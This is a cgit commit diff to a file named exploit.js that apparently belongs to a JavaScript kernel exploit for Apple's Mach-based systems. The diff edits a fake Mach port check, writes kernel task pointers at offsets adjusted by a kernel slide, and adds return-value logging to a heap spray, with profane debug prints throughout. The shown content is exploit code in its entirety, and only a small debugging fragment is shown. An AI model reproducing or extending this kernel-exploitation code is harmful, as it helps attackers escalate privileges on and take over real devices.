summaryrefslogtreecommitdiff
path: root/src
diff options
context:
space:
mode:
Diffstat (limited to 'src')
-rwxr-xr-xsrc/js/kexp/exploit.js13
1 files changed, 5 insertions, 8 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index fbca86c..6f34aaf 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -496,11 +496,7 @@ again: while (true) {
*/
// var fake_port = mach_ports_lookup_shit();
printf("fuck\n");
- if (fake_port === 0 || fake_port === 0xffffffff) {
- printf("fuck. fake port is fucked.\n");
- continue again;
- }
- scall("printf", "%x\n", fake_port);
+ printf("%x\n", fake_port);
printf("fuck\n");
// todo: add mach_port_valid stuff
printf("fuck\n");
@@ -508,8 +504,8 @@ again: while (true) {
printf("fuck\n");
write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
printf("fuck\n");
- write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
-// write_u32(ptr, 0x73707621 - BSDINFO_PID_OFFSET);
+// write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+ write_u32(ptr, 0x41414141 - BSDINFO_PID_OFFSET);
printf("fuck\n");
var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
printf("fuck\n");
@@ -527,7 +523,8 @@ again: while (true) {
usleep(10000);
sched_yield();
mach_port_destroy(mach_task_self(), read_u32(fakeportData));
- spray_data(tst, tst_str.length, 10, fakeportData);
+ ret__ = spray_data(tst, tst_str.length, 10, fakeportData);
+ printf("sd %d (%s)\n", ret__, mach_error_string(ret__));
printf("fuck\n");
printf("done realloc");
printf("fuck\n");
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 21:18:51 +0000